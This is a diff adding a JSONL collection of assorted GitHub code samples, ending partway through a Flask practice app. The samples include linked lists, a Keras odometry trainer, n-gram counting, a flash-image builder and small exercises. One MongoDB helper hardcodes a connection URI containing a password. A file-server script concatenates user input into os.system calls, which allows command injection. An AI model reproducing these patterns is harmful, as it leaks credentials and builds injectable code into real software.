diff --git "a/2692.jsonl" "b/2692.jsonl" new file mode 100644--- /dev/null +++ "b/2692.jsonl" @@ -0,0 +1,1826 @@ +{"seq_id":"3577597038","text":"class Node:\n def __init__(self,data = None, next=None):\n self.data = data\n self.next = next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_in_beginning(self,data):\n node = Node(data,self.head)\n self.head = node\n\n def print(self):\n\n if(self.head is None):\n print(\"The linked list is empty\")\n return\n\n itr = self.head\n llistr = ''\n\n while itr:\n llistr += str(itr.data) + '-->'\n itr = itr.next\n\n print(llistr)\n\n def insert_at_end(self,data):\n if self.head == None:\n node = Node(data,None)\n\n itr = self.head\n\n while itr.next:\n\n itr = itr.next\n\n \n node = Node(data,None)\n itr.next = node\n\n def insert_list(self,data_list):\n\n for val in data_list:\n self.insert_at_end(val)\n\n def get_length(self):\n\n itr = self.head\n len = 0\n while itr:\n len += 1\n itr = itr.next\n\n return len\n\n def remove_at(self,index):\n\n if index < 0 or index >= self.get_length():\n print(\"Index out of bound !!\")\n return\n\n if index == 0:\n self.head = self.head.next #remove first element\n\n itr = self.head\n i = 0\n while i < index-1:\n i += 1\n itr = itr.next\n \n\n temp = itr.next.next\n itr.next = temp\n\n return\n\n def insert_at(self,index,data):\n\n if index<0 or index >= self.get_length():\n print(\"Index out of bound!\")\n return\n\n if index == 0:\n self.insert_in_beginning(data)\n return\n\n if index == self.get_length() - 1:\n self.insert_at_end(data)\n return\n \n itr = self.head\n count = 0\n\n while count < index - 1:\n itr = itr.next\n count += 1\n\n node = Node(data,itr.next)\n\n itr.next = node\n\n return\n\n\n\n\nif __name__ == '__main__':\n ll = LinkedList()\n ll.insert_in_beginning(23)\n ll.insert_in_beginning(24)\n ll.insert_at_end(50)\n ll.insert_at_end(60)\n ll.insert_list([1,2,3,4,5,6])\n ll.print()\n print(ll.get_length())\n #ll.remove_at(20)\n ll.insert_at(2,45)\n ll.insert_at(3,52)\n ll.print()\n\n","repo_name":"abhirup706/Interview-Prep","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31698816688","text":"import argparse\r\nimport keras as K\r\nimport numpy as np\r\nimport os\r\nimport signal\r\nimport sys\r\n\r\nfrom epoch import Epoch\r\nfrom keras.layers import Dense, Activation, MaxPooling2D, Dropout, LSTM, Flatten, merge, TimeDistributed\r\nfrom subseq_preds_to_full_pred import subseq_preds_to_full_pred\r\nfrom time import time\r\n\r\nfrom keras.layers import Concatenate\r\n\r\nfrom keras.layers.convolutional import Conv2D\r\n\r\nap = argparse.ArgumentParser()\r\n\r\nap.add_argument('--batch_size', type=int, default=1)\r\nap.add_argument('--beta', type=int, default=100, help='Weight on orientation loss')\r\nap.add_argument('--data_dir', type=str, default='data/dataset', help='Where KITTI data is stored')\r\nap.add_argument('--hidden_dim', type=int, default=100, help='Dimension of LSTM hidden state')\r\nap.add_argument('--layer_num', type=int, default=2, help='How many LSTM layers to stack')\r\nap.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for gradient descent optimization')\r\nap.add_argument('--num_epochs', type=int, default=5, help='How many full passes to make over the training data')\r\nap.add_argument('--step_size', type=int, default=10, help='How many optical flow samples to skip between subsequences.')\r\nap.add_argument('--subseq_length', type=int, default=50, help='How many optical flow images to include in one subsequence during training. Affects memory consumption.')\r\nap.add_argument('--mode', default = 'train', help=\"train or test. Train produces model checkpoints, test outputs csvs of poses for each testing sequence.\")\r\nap.add_argument('--snapshot_dir', default='snapshots/', help='what folder to store model snapshots in')\r\n\r\nargs = vars(ap.parse_args())\r\n\r\n\r\ndef custom_loss_with_beta(beta):\r\n def weighted_mse(y_true, y_pred):\r\n \"\"\"Custom loss function for jointly learning\r\n position and orientation.\r\n\r\n Args:\r\n y_true: The pose label\r\n y_pred: The estimated pose\r\n\r\n Returns:\r\n L_x + beta*L_q\r\n\r\n Where L_x is the position loss,\r\n L_q is the orientation loss,\r\n and beta is a hyperparameter\r\n \"\"\"\r\n\r\n ### LOSS SO NEW IT WRAPS BACK AROUND TO BEING OLD ###\r\n \r\n squared_diff = K.backend.square(y_pred - y_true)\r\n\r\n y_shape = K.backend.int_shape(squared_diff)\r\n y_shape = (args['batch_size'],) + y_shape[1:]\r\n #print(\"y_shape\")\r\n #print(y_shape)\r\n\r\n weights = np.ones(y_shape)\r\n weights[..., 3:] = beta\r\n weights = K.backend.variable(weights)\r\n\r\n # element-wise multiplication\r\n squared_diff_weighted = squared_diff * weights\r\n\r\n loss = K.backend.mean(squared_diff_weighted, axis=-1)\r\n \r\n\r\n ### NEWER LOSS ###\r\n \"\"\"\r\n diff_abs = K.backend.abs(y_pred - y_true)\r\n\r\n y_shape = K.backend.int_shape(diff_abs)\r\n y_shape = (args['batch_size'],) + y_shape[1:]\r\n print(\"y_shape\")\r\n print(y_shape)\r\n\r\n position_identity = np.zeros(y_shape)\r\n position_identity[..., 0:3] = 1\r\n position_identity = K.backend.variable(position_identity)\r\n\r\n position_diff_abs = diff_abs * position_identity\r\n\r\n orientation_identity = np.zeros(y_shape)\r\n orientation_identity[..., 4:7] = 1\r\n orientation_identity = K.backend.variable(position_identity)\r\n\r\n orientation_diff_abs = diff_abs * orientation_identity\r\n\r\n orientation_diff_abs_other_way = K.backend.variable(np.full(y_shape, 2*np.pi)) - orientation_diff_abs\r\n\r\n orientation_diff_abs_other_way = orientation_diff_abs_other_way * orientation_identity\r\n\r\n orientation_diff_magnitude = K.backend.minimum(orientation_diff_abs,\r\n orientation_diff_abs_other_way)\r\n\r\n # Scale values by beta\r\n orientation_diff_magnitude = orientation_diff_magnitude * np.sqrt(beta)\r\n\r\n combined_diff = position_diff_abs + orientation_diff_magnitude\r\n\r\n loss = K.backend.mean(K.backend.square(combined_diff), axis=-1)\r\n \"\"\"\r\n\r\n ###\r\n ## NEW LOSS WHICH HANDLES ANGLES\r\n ##\r\n \"\"\"\r\n p_true = K.backend.gather(y_true, K.backend.variable(np.array([0,1,2]), dtype='int32'))\r\n p_pred = K.backend.gather(y_pred, K.backend.variable(np.array([0,1,2]), dtype='int32'))\r\n q_true = K.backend.gather(y_true, K.backend.variable(np.array([3,4,5]), dtype='int32'))\r\n q_pred = K.backend.gather(y_pred, K.backend.variable(np.array([3,4,5]), dtype='int32'))\r\n\r\n L_x = K.backend.mean(K.backend.square(p_pred - p_true), axis=-1)\r\n\r\n q_diff_abs = K.backend.abs(q_pred - q_true)\r\n\r\n q_diff_other_way = K.backend.variable(np.full(K.backend.int_shape(q_diff_abs), 2*np.pi)) - q_diff_abs\r\n\r\n q_magnitude = K.backend.minimum(q_diff_abs, q_diff_other_way)\r\n\r\n L_q = K.backend.mean(K.backend.square(q_magnitude), axis=-1)\r\n\r\n loss = L_x + beta * L_q\r\n \"\"\"\r\n ####\r\n ###OLD LOSS\r\n ####\r\n \"\"\"\r\n # Take the difference of each pose label and its estimate,\r\n # and square that element-wise\r\n squared_diff = K.backend.square(y_pred - y_true)\r\n\r\n # Multiply the orientations by beta, and sum\r\n # each tensor up\r\n weights = K.backend.variable(np.array([1,1,1,beta,beta,beta]))\r\n loss = K.backend.squeeze(K.backend.dot(squared_diff, K.backend.expand_dims(weights)), axis=-1)\r\n \"\"\"\r\n return loss\r\n return weighted_mse \r\n\r\n# Separate the sequences for which there is ground truth into test \r\n# and train according to the paper's partition. \r\ntrain_seqs = ['00', '02', '08', '09'] \r\ntest_seqs = ['03', '04', '05', '06', '07', '10']\r\n\r\n# Create a data loader to get batches one epoch at a time\r\nepoch_data_loader = Epoch(datadir=args['data_dir'],\r\n flowdir=os.path.join(args['data_dir'], \"flows\"),\r\n train_seq_nos=train_seqs,\r\n test_seq_nos=test_seqs,\r\n window_size=args['subseq_length'],\r\n step_size=args['step_size'],\r\n batch_size=args['batch_size'])\r\n\r\n# What is the shape of the input flow images?\r\nflow_input_shape = epoch_data_loader.get_input_shape()\r\n\r\n# Define Keras model architecture\r\nmodel = K.models.Sequential()\r\n\r\n# Reducing input dimensions via conv-pool layers\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3)),\r\n input_shape=(args[\"subseq_length\"], *flow_input_shape)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(7, 7))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(5, 5))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(5, 5))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(3, 3))))\r\n\r\n# Flatten outputs for input to LSTM\r\nmodel.add(TimeDistributed(Flatten()))\r\n\r\n# Stacked LSTM layers\r\nfor i in range(args['layer_num']):\r\n model.add(LSTM(args['hidden_dim'], return_sequences=True))\r\n\r\n# A single dense layer to convert the LSTM output into\r\n# a pose estimate vector of length 6. We use the default\r\n# linear activation because pose position values can be\r\n# unbounded.\r\nmodel.add(TimeDistributed(Dense(6)))\r\n\r\n\r\n# Compile the model, with custom loss function\r\nmodel.compile(loss=custom_loss_with_beta(beta=args['beta']),\r\n optimizer=K.optimizers.Adam(lr=args['learning_rate']))\r\n#model.compile(loss = \"mse\", optimizer = \"adam\")\r\n\r\n# Describe layers and parameters\r\nprint(\"Model summary:\")\r\nprint(model.summary())\r\n\r\n# Set where weights and optimizer state are saved and loaded from\r\nsnapshot_path = os.path.join(args['snapshot_dir'],\r\n\t\t\t 'model.h5')\r\n\r\n# Load snapshot if it exists\r\nif os.path.isfile(snapshot_path):\r\n print(\"Loading snapshot found at {}\".format(snapshot_path))\r\n model = K.models.load_model(snapshot_path, custom_objects={'weighted_mse': custom_loss_with_beta(beta=args['beta'])})\r\nelse:\r\n # We can't test the network if we haven't already trained it\r\n if args['mode'] == 'test':\r\n print(\"ERROR: Trying to test network but snapshot file {} not found.\".format(snapshot_path))\r\n sys.exit()\r\n\r\n# Create TensorBoard\r\ntensorboard = K.callbacks.TensorBoard(\r\n log_dir=\"logs/{}\".format(time()),\r\n update_freq='batch')\r\n\r\n# Attach it to our model\r\ntensorboard.set_model(model)\r\n\r\n# Create signal handler to catch Ctrl-C\r\n# and save model before shutdown\r\ndef signal_handler(sig, frame):\r\n model.save(snapshot_path)\r\n sys.exit(0)\r\nsignal.signal(signal.SIGINT, signal_handler)\r\n\r\nif args['mode'] == 'train':\r\n batch_num = 0\r\n for epoch in range(args['num_epochs']):\r\n\r\n # Test loss\r\n testing_losses = []\r\n #while not epoch_data_loader.testing_is_complete():\r\n for i in range(30):\r\n\r\n # temp solution because testing loss calculation\r\n # is taking too long\r\n if epoch_data_loader.testing_is_complete():\r\n continue\r\n\r\n # Get batch of random samples (subsequences)\r\n # from held-out KITTI sequences\r\n X, Y = epoch_data_loader.get_testing_batch()\r\n\r\n # Get testing loss on this batch\r\n loss = model.test_on_batch(X, Y)\r\n\r\n # Store loss for mean\r\n testing_losses.append(loss)\r\n\r\n # Calculate average loss across test set\r\n mean_test_loss = np.mean(testing_losses)\r\n\r\n # Some console lovin\r\n print(\"[Epoch {}] TESTING LOSS: {}\".format(epoch,\r\n mean_test_loss))\r\n\r\n # Write test loss to tensorboard\r\n tensorboard.on_batch_end(batch_num,\r\n dict(validation_loss=mean_test_loss,\r\n size=1))\r\n\r\n # Train loss\r\n training_losses = []\r\n while not epoch_data_loader.training_is_complete():\r\n\r\n # Get batch of random samples (subsequences)\r\n X, Y = epoch_data_loader.get_training_batch()\r\n\r\n # Update weights, and get training loss on this batch\r\n loss = model.train_on_batch(X, Y)\r\n\r\n # Store loss\r\n training_losses.append(loss)\r\n\r\n # Some console lovin\r\n print(\"[Epoch {} Batch {}] TRAINING LOSS: {}\".format(epoch,\r\n batch_num,\r\n loss))\r\n\r\n # save loss history for this batch\r\n # on_batch_end doesn't work!? using on_epoch_end temporarily\r\n tensorboard.on_batch_end(batch_num, dict(training_loss=loss,\r\n size=1))\r\n batch_num += 1\r\n\r\n\r\n # Calculate average loss of all samples this epoch\r\n mean_train_loss = np.mean(training_losses)\r\n\r\n print(\"Epoch {} finished. AVG TRAINING LOSS: {}\".format(epoch,\r\n mean_train_loss))\r\n\r\n # save loss history with tensorboard at the end of each epoch\r\n #tensorboard.on_epoch_end(epoch, dict(epoch_training_loss=mean_train_loss))\r\n\r\n # Re partition and shuffle samples\r\n epoch_data_loader.reset()\r\n\r\n\r\n # Once we're done with training, save the model\r\n print(\"TRAINING FINISHED. SAVING SNAPSHOT TO {}\".format(snapshot_path))\r\n model.save(snapshot_path)\r\n\r\n # And tell tensorboard\r\n tensorboard.on_train_end(None)\r\n\r\nelif args['mode'] == 'test':\r\n\r\n for kitti_seq in test_seqs:\r\n\r\n # Open output file to write pose results to\r\n out_fname = \"test_results/{}.csv\".format(kitti_seq)\r\n\r\n losses = []\r\n estimated_poses = []\r\n for X, Y in epoch_data_loader.get_testing_samples(kitti_seq):\r\n\r\n # batch size of 1\r\n X = X[np.newaxis, :]\r\n\r\n #print(\"TESTING X SIZE = {}\".format(X.shape))\r\n\r\n # get pose estimate\r\n estimated_batch = model.predict_on_batch(X)\r\n\r\n # TODO: Fix this to be more general for different batch sizes\r\n estimated_pose = estimated_batch[0]\r\n\r\n estimated_poses.append(estimated_pose)\r\n\r\n\r\n # Get testing loss\r\n Y = Y[np.newaxis, :] # batch size of 1\r\n loss = model.test_on_batch(X, Y)\r\n #print(\"TESTING LOSS: {}\".format(loss))\r\n losses.append(loss)\r\n\r\n # Calculate average loss of this sequence\r\n mean_seq_loss = np.mean(losses)\r\n\r\n print(\"Testing sequence {} finished. AVG TEST LOSS: {}\".format(\\\r\n kitti_seq,\r\n mean_seq_loss))\r\n\r\n # Put poses back in original reference frame\r\n # and write out to file\r\n subseq_preds_to_full_pred(estimated_poses, out_fname)\r\n\r\n # save loss history with tensorboard at the end of each sequence\r\n #tensorboard.on_epoch_end(epoch, dict(testing_loss=mean_loss))\r\n\r\nelse:\r\n print(\"ERROR: Mode {} not recognized\".format(args['mode']))\r\n\r\n","repo_name":"NoahRJohnson/deepVO","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":13682,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"40116738673","text":"# 英大文字の文字列が入力されます。\n# 文字列の先頭1文字が、末尾1文字よりもアルファベット順で先に出現するならば、\"true\"を出力し、そうでなければ\"false\"を出力してください。\n\ns = input()\nif s[0] < s[-1]:\n print(\"true\")\nelse:\n print(\"false\")\n\n\n# Python3では文字列strはUnicodeであり、文字列の大小関係(順番)は文字のUnicodeコードポイント(文字コード)で判定される。\n\n\n# 解答2\nstring = input()\nalphabets = [\n \"A\",\n \"B\",\n \"C\",\n \"D\",\n \"E\",\n \"F\",\n \"G\",\n \"H\",\n \"I\",\n \"J\",\n \"K\",\n \"L\",\n \"M\",\n \"N\",\n \"O\",\n \"P\",\n \"Q\",\n \"R\",\n \"S\",\n \"T\",\n \"U\",\n \"V\",\n \"W\",\n \"X\",\n \"Y\",\n \"Z\",\n]\nresult = \"true\"\n\nfirst = string[0]\nlast = string[len(string) - 1]\n\nfor alphabet in alphabets:\n if first == alphabet:\n break\n\n if last == alphabet:\n result = \"false\"\n\nprint(result)","repo_name":"kanp7/paiza","sub_path":"Python/rankB_Up/AlphabetSearch/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19915591723","text":"import pymongo\n\n\nclass MongoDB:\n def __init__(self):\n pass\n\n def mongoConnect(self):\n Mongo_URI = \"mongodb+srv://m001-student:123asterisco@sandbox.kvjof.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\n try:\n self.cliente = pymongo.MongoClient(Mongo_URI)\n self.cliente.server_info()\n return \"Conexion a MongoDB Exitosa\"\n except pymongo.errors.ConnectionFailure as errorConexion:\n self.cliente = pymongo.MongoClient('localhost', 27017)\n self.cliente.server_info()\n\n def insertData(self, data):\n try:\n self.mydb = self.cliente['adonis']\n self.tabla = self.mydb['people']\n self.datosIns = self.tabla.insert_one(data)\n return \"Datos insertados a MongoDB\"\n except:\n return \"No se insertado\"\n","repo_name":"GabrielRuiseco19170012/OrionPy","sub_path":"MongoDB.py","file_name":"MongoDB.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27875137702","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nfrom make import make_args, make_builddir, make_platform\n\nBIOS_SIZE = 0x8000\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SPI Flash contents tool\")\n make_args(parser)\n\n parser.add_argument(\"--override-gateware\")\n parser.add_argument(\"--override-bios\")\n parser.add_argument(\"--override-firmware\")\n\n args = parser.parse_args()\n\n builddir = make_builddir(args)\n gateware = os.path.join(builddir, \"gateware\", \"top.bin\")\n if args.override_gateware:\n if args.override_gateware.lower() == \"none\":\n gateware = None\n else:\n gateware = args.override_gateware\n if gateware:\n assert os.path.exists(gateware), (\n \"Gateware file not found! \"\n \"Use --override-gateware=none for no gateware.\")\n\n bios = os.path.join(builddir, \"software\", \"bios\", \"bios.bin\")\n if args.override_bios:\n if args.override_bios.lower() == \"none\":\n bios = None\n else:\n bios = args.override_bios\n if bios:\n assert os.path.exists(bios), (\n \"BIOS file not found! \"\n \"Use --override-bios=none for no BIOS.\")\n\n firmware = os.path.join(builddir, \"software\", \"firmware\", \"firmware.fbi\")\n if args.override_firmware:\n if args.override_firmware.lower() == \"none\":\n firmware = None\n else:\n firmware = args.override_firmware\n if firmware:\n assert os.path.exists(firmware), (\n \"Firmware file not found! \"\n \"Use --override-firmware=none for no firmware.\")\n\n platform = make_platform(args)\n\n gateware_pos = 0\n bios_pos = platform.gateware_size\n firmware_pos = platform.gateware_size + BIOS_SIZE\n\n output = os.path.join(builddir, \"flash.bin\")\n print()\n with open(output, \"wb\") as f:\n # FPGA gateware\n if gateware:\n gateware_data = open(gateware, \"rb\").read()\n else:\n gateware_data = b\"\"\n gateware = \"Skipped\"\n\n print((\"Gateware @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - Xilinx FPGA Bitstream\"\n ).format(gateware_pos, len(gateware_data), gateware))\n print(\" \".join(\"{:02x}\".format(i) for i in gateware_data[:64]))\n assert len(gateware_data) < platform.gateware_size\n f.seek(0)\n f.write(gateware_data)\n\n if bios:\n bios_data = open(bios, \"rb\").read()\n else:\n bios_data = b\"\"\n bios = \"Skipped\"\n\n # LiteX BIOS\n assert len(bios_data) < BIOS_SIZE\n f.seek(bios_pos)\n f.write(bios_data)\n print((\" BIOS @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - LiteX BIOS with CRC\"\n ).format(bios_pos, len(bios_data), bios))\n print(\" \".join(\"{:02x}\".format(i) for i in bios_data[:64]))\n\n if firmware:\n firmware_data = open(firmware, \"rb\").read()\n else:\n firmware_data = b\"\"\n firmware = \"Skipped\"\n\n # SoftCPU firmware\n print((\"Firmware @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - HDMI2USB Firmware in FBI format (loaded into DRAM)\"\n ).format(firmware_pos, len(firmware_data), firmware))\n print(\" \".join(\"{:02x}\".format(i) for i in firmware_data[:64]))\n f.seek(firmware_pos)\n f.write(firmware_data)\n\n # Result\n remain = platform.spiflash_total_size - (\n firmware_pos+len(firmware_data))\n print(\"-\"*40)\n print((\" Remaining space {:10} bytes\"\n \" ({} Megabits, {:.2f} Megabytes)\"\n ).format(remain, int(remain*8/1024/1024), remain/1024/1024))\n total = platform.spiflash_total_size\n print((\" Total space {:10} bytes\"\n \" ({} Megabits, {:.2f} Megabytes)\"\n ).format(total, int(total*8/1024/1024), total/1024/1024))\n\n print()\n print(\"Flash image: {}\".format(output))\n flash_image_data = open(output, \"rb\").read()\n print(\" \".join(\"{:02x}\".format(i) for i in flash_image_data[:64]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mithro/HDMI2USB-litex-firmware-old","sub_path":"mkimage.py","file_name":"mkimage.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"7156332610","text":"import os\nimport collections\nimport json\nfrom lib.util import CONST_END_WORD\nfrom lib.util import sliding, ngramWindow\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass NGramModel(object):\n def __init__(self, windowSizeList, generatePdf=False, filters=[]):\n self.windowSizeList = windowSizeList\n self.ngramCount = {}\n self.ntotalCounts = {}\n self.ngramDomainTopicDict = {}\n self.nGramPdf = {}\n self.nGramProb = {}\n self.baseDir = None\n self.domainList = []\n self.filters = filters\n self.vocabSize = 0\n self.kSmoothingFactor = 0.00001\n self.generatePdf = generatePdf\n #self.kSmoothingFactor = 0.0001\n\n def _getVocabSize(self):\n if 1 in self.windowSizeList:\n self.vocabSize = sum([wordCount for _, wordCount in self.ngramCount[1].items()])\n else:\n self._count([1])\n self.vocabSize = sum([wordCount for _, wordCount in self.ngramCount[1].items()])\n\n def _count(self, windowSizeList, generatePdf=False):\n for wSize in windowSizeList:\n ngramCount = collections.Counter()\n ntotalCounts = collections.Counter()\n for domain in self.domainList:\n dataDir = os.path.join(self.baseDir, domain)\n for (currDir, _, fileList) in os.walk(dataDir):\n for filename in fileList:\n\n if 'all' not in self.filters:\n skipFile = True\n for fl in self.filters:\n if fl in filename:\n skipFile = False\n break\n\n if skipFile:\n continue\n\n if filename.endswith('.json'):\n fullName = os.path.join(currDir, filename)\n #logger.info(\"filename : %s\" % fullName)\n with open(fullName, \"r\") as f:\n cData = json.load(f)\n articleText = cData.get(\"article\", None)\n domain = cData.get(\"domain\", None)\n topic = cData.get(\"theme\", None)\n domainTopicKey = (domain, topic)\n if not articleText:\n logger.debug(\"%s skipped\" % filename)\n continue\n\n textList = articleText.strip().split(\" \")\n # Update vocab size\n logger.debug(\"textList : %s\" % textList)\n ngramList = [ngramWindow(wordSeg, wSize) for wordSeg in sliding(textList, wSize)]\n # Add last words\n prevWord = list(ngramList[-1])\n lastWord = prevWord[1:] + [CONST_END_WORD]\n ngramList.append(tuple(lastWord))\n\n if generatePdf:\n for ngram in ngramList:\n ngramKey = ngram[:-1]\n if ngramKey not in self.ngramDomainTopicDict:\n self.ngramDomainTopicDict[ngramKey] = [domainTopicKey]\n continue\n\n self.ngramDomainTopicDict[ngramKey].append(domainTopicKey)\n\n ngramCount.update(ngramList)\n if wSize != 1:\n ntotalCounts.update([x[:-1] for x in ngramList])\n\n self.ngramCount[wSize] = ngramCount\n if wSize != 1:\n self.ntotalCounts[wSize] = ntotalCounts\n\n def _nGramProb(self):\n vSizeFraction = self.kSmoothingFactor * float(self.vocabSize)\n for wSize in self.windowSizeList:\n nGramProb = collections.defaultdict(float)\n nGramPdf = {}\n for ngram in self.ngramCount[wSize]:\n ngramCount = self.ngramCount[wSize][ngram]\n if wSize != 1:\n totalCount = self.ntotalCounts[wSize][ngram[0:-1]]\n else:\n totalCount = self.vocabSize\n\n #if self.generatePdf:\n # ngramKey = ngram[:-1]\n # if ngramKey not in self.nGramPdf:\n # nGramPdf[ngramKey] = [(float(ngramCount) / totalCount, ngram[-1])]\n # continue\n #\n # nGramPdf[ngramKey].append((float(ngramCount) / totalCount, ngram[-1]))\n\n if self.generatePdf:\n ngramKey = ngram[:-1]\n for domainTopicKey in self.ngramDomainTopicDict.get(ngramKey, []):\n if ngramKey not in self.nGramPdf:\n nGramPdf[ngramKey] = {domainTopicKey: [(float(ngramCount) / totalCount, ngram[-1])]}\n continue\n\n if domainTopicKey not in self.nGramPdf[ngramKey]:\n nGramPdf[ngramKey][domainTopicKey] = [(float(ngramCount) / totalCount, ngram[-1])]\n\n nGramPdf[ngramKey][domainTopicKey].append((float(ngramCount) / totalCount, ngram[-1]))\n\n #self.nGramProb[ngram] += float(ngramCount) / totalCount\n nGramProb[ngram] += (float(ngramCount) + self.kSmoothingFactor) / (vSizeFraction + totalCount)\n\n self.nGramProb[wSize] = nGramProb\n self.nGramPdf[wSize] = nGramPdf\n\n def countNgrams(self, domainList, baseDir=\".\"):\n self.baseDir = baseDir\n self.domainList = domainList\n logger.debug(\"get count\")\n self._count(self.windowSizeList, self.generatePdf)\n logger.debug(\"get vocab size\")\n self._getVocabSize()\n\n def generateModel(self):\n self._nGramProb()\n return self.nGramPdf\n\n","repo_name":"arashjamalian/cs221_ngramModel","sub_path":"models/ngram_model.py","file_name":"ngram_model.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31208948782","text":"#AUTOR: KEYTEL PUMAYLLE RAMIREZ \r\n#Librerias\r\nimport socket\r\nimport ftplib\r\nfrom os import system\r\nfrom time import sleep\r\n\r\n#Detalles del servidor\r\nhostname = socket.gethostname()\r\nip_servidor = socket.gethostbyname(hostname)\r\nprint(\"http:////archivo_descargar>\")\r\nprint(\"Ip_servidor: \"+ip_servidor)\r\n\r\n#Direccionandonos al directorio del archivo\r\nprint(\"Ingrese el disco (C:, G:, E:, ...): \")\r\nletra_disco = str(input())\r\n\r\nprint(\"Ingrese la ruta de la carpeta: \")\r\nruta_archivo = input()\r\n\r\n\r\n\r\n\r\n#Levantando servidor\r\nprint(\"IDesea levantar el servidor: \")\r\ncondicion = input()\r\n\r\nif condicion == 's':\r\n print(\"Levantando servidor...\")\r\n system(letra_disco)\r\n sleep(1)\r\n system(\"cd \"+ ruta_archivo)\r\n sleep(5)\r\n system(\"python -m http.server\")\r\nelse:\r\n print(\"Servidor caido\")","repo_name":"keytelpumaylle/transferencia-archivos-ftp-python","sub_path":"transfer-file-ftp.py","file_name":"transfer-file-ftp.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23567874734","text":"class Solution:\n \"\"\"\n [Easy] Verify Max Heap solution from binarysearch.com\n Problem is about verifying input list represents max heap, that is \n for each i:\n nums[i] >= nums[2 * i + 1] \n and\n nums[i] >= nums[2 * i + 1]\n Time complexity: O(n)\n Space complexity: O(1)\n \"\"\"\n def solve(self, nums) -> bool:\n for i in range(len(nums)):\n left = 2 * i + 1\n right = 2 * i + 2\n if left < len(nums) and nums[i] < nums[left]:\n return False\n if right < len(nums) and nums[i] < nums[right]:\n return False\n # early break\n if right >= len(nums):\n break\n return True","repo_name":"jam231/binarysearch","sub_path":"verify-max-heap/python/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18735843805","text":"import sys\nsys.path.append('con_4/games')\nfrom game_1 import Con4\nfrom comp_plr import *\nfrom rand_plr import Row3\n\n'''\nresults = {1: 0, 2: 0, 'Tie': 0}\n\nplayers = [TreePlayerHeuristic(4), Row3()]\ngame = Con4(players)\ngame.run_to_completion()\nresults[game.winner]+= 1\nprint(results)\n\n\n'''\ntests = 20\nresults = {1: 0, 2: 0, 'Tie': 0}\n#print('\\n\\n')\nfor loop in range(tests) :\n print(loop)\n players = [HeuristicStrat(4), Row3()]\n game = Con4(players)\n game.run_to_completion()\n results[game.winner]+= 1\n\nprint(results)\nprint('Percentage Won by Heuristic (4) Plr:', results[1]/tests)\nprint('Percentage Won by Row3 Plr:', results[2]/tests)\nprint('Percentage of Cats Games:', results['Tie']/tests)\n#'''\n\n","repo_name":"snowthesprite/games","sub_path":"con_4/test_game_1.py","file_name":"test_game_1.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8848305028","text":"from flask import Flask, escape, request, render_template \nimport requests \nimport json\nimport random\n\napp = Flask(__name__)\n\n@app.route('/')\n\ndef hello():\n name = request.args.get(\"name\",\"World\")\n return f'Hello, {escape(name)}!'\n\n@app.route('/myname')\ndef myname():\n return '양시영입니다'\n\n# 점심메뉴 랜덤추천 서버\n@app.route('/lunch')\ndef lunch():\n menus = ['양자강','김밥카페','20층','순남시래기']\n lunch = random.choice(menus)\n return lunch\n\n# 아이돌 백과사전\n@app.route('/idol')\ndef idol():\n idols = {\n 'bts' :\n {\n '지민' : 25,\n 'RM' : 23,\n },\n 'rv' : '레드벨벳',\n '핑클' : \n {\n '이효리' : '거꾸로 해도 이효리',\n '옥주현' : 35\n },\n 'SES' : \n [\n '유진','바다','슈'\n ]\n }\n\n return idols\n\n@app.route('/post/')\ndef post(num):\n posts = ['0번 포스트', '1번 포스트','2번 포스트']\n return posts[num]\n\n\n# 실습 - cube뒤에 전달된 수의 세제곱수를 화면에 보여주세요\n@app.route('/cube/')\ndef cube(num):\n num_Cube = num**3\n return str(num_Cube)\n\n# 클라이언트에게 html 파일을 줌\n@app.route('/html')\ndef html():\n return render_template('hello.html')\n\n@app.route('/ping')\ndef ping():\n return render_template('ping.html')\n\n@app.route('/pong')\ndef pong():\n age = request.args.get('age')\n #age = request.agrs['age'] 거의 유사하게 동작. 다만 오류가 났을 때 발생하는 문제가 다름\n return 